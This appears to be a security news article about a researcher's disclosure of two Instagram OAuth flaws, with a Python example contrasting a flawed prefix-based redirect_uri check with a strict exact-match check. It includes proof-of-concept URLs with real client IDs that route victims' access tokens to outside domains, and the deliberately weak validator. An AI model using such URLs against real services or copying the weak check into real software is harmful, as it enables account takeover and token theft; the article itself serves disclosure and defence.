The Hacker News
Nir Goldshlager, known as the Facebook hacker and founder of Break Security, who has reported many critical bugs in Facebook's OAuth mechanism over the past few months, today disclosed a critical vulnerability in Instagram's OAuth that allows an attacker to hijack any account.

A successful attack gives the attacker access to the victim's private photos, the ability to delete the victim's photos and edit comments, and the ability to post new photos.

The hacker explained that there are two ways to hijack Instagram accounts using OAuth: through the Instagram OAuth flow itself, or through the Facebook OAuth Dialog.


During his bug hunting, Nir found a loophole in Instagram's validation of the redirect_uri security parameter: the check accepted his own domain with "mx" appended as a suffix, so the access token (or code) was sent straight to breaksec.com.mx.

POC: https://instagram.com/oauth/authorize/?client_id=33221863eec546659f2564dd71a8a38d&redirect_uri=https://breaksec.com.mx&response_type=token

In the second method, the hacker hijacks Instagram accounts using the Facebook OAuth Dialog. "When a user wants to upload their Instagram photos to Facebook, they allow this interaction and integration to take place. I discovered that an attacker can use virtually any domain in the redirect_uri, next parameter."

Here the attacker can supply any domain in the redirect_uri / next parameter of the dialog for the Instagram client_id, and so steal the access_token of the victim's account.

POC: https://www.facebook.com/connect/uiserver.php?app_id=124024574287414&next=https://files.nirgoldshlager.com&display=page&fbconnect=1&method=permissions.request&response_type=token
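The common root of both findings is a redirect target (redirect_uri, or a secondary parameter such as next) that is not matched exactly against what the client registered. The following is an added illustration, not code from Instagram, Facebook or the researcher: a prefix-style host check of the kind the article describes beside the exact-match check that closes the hole. The client_id "demo-client" and the registered URI https://example-app.com/callback are constructed sample data.

```python
from urllib.parse import urlsplit

# Constructed sample: redirect URIs pre-registered for a hypothetical client_id.
# (Not Instagram's real configuration; illustrative only.)
REGISTERED_REDIRECT_URIS = {
    "demo-client": ["https://example-app.com/callback"],
}


def weak_redirect_check(client_id: str, redirect_uri: str) -> bool:
    """The flawed pattern the article describes: the requested host only has
    to *start with* a registered host, so 'example-app.com.mx' is accepted
    for a client registered as 'example-app.com'."""
    requested_host = urlsplit(redirect_uri).hostname or ""
    for registered in REGISTERED_REDIRECT_URIS.get(client_id, []):
        registered_host = urlsplit(registered).hostname or ""
        if requested_host.startswith(registered_host):
            return True
    return False


def strict_redirect_check(client_id: str, redirect_uri: str) -> bool:
    """Hardened check: exact, component-wise match against a registered URI
    (scheme, host, port, path, query); https only; no fragment. The same rule
    should be applied to any secondary redirect parameter such as 'next'."""
    try:
        req = urlsplit(redirect_uri)
        req_port = req.port  # raises ValueError on a malformed port
    except ValueError:
        return False
    if req.scheme != "https" or req.fragment:
        return False
    for registered in REGISTERED_REDIRECT_URIS.get(client_id, []):
        reg = urlsplit(registered)
        if (req.scheme, req.hostname, req_port, req.path, req.query) == (
            reg.scheme, reg.hostname, reg.port, reg.path, reg.query
        ):
            return True
    return False


if __name__ == "__main__":
    for uri in ("https://example-app.com/callback", "https://example-app.com.mx"):
        print(uri, "weak:", weak_redirect_check("demo-client", uri),
              "strict:", strict_redirect_check("demo-client", uri))
```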

Earlier findings by Nir:
  1. Hacking Facebook users just from chat box using multiple vulnerabilities
  2. Facebook OAuth flaw allows gaining full control over any Facebook account
  3. Facebook hacking accounts using another OAuth vulnerability
  4. URL Redirection flaw in Facebook apps push OAuth vulnerability again in action
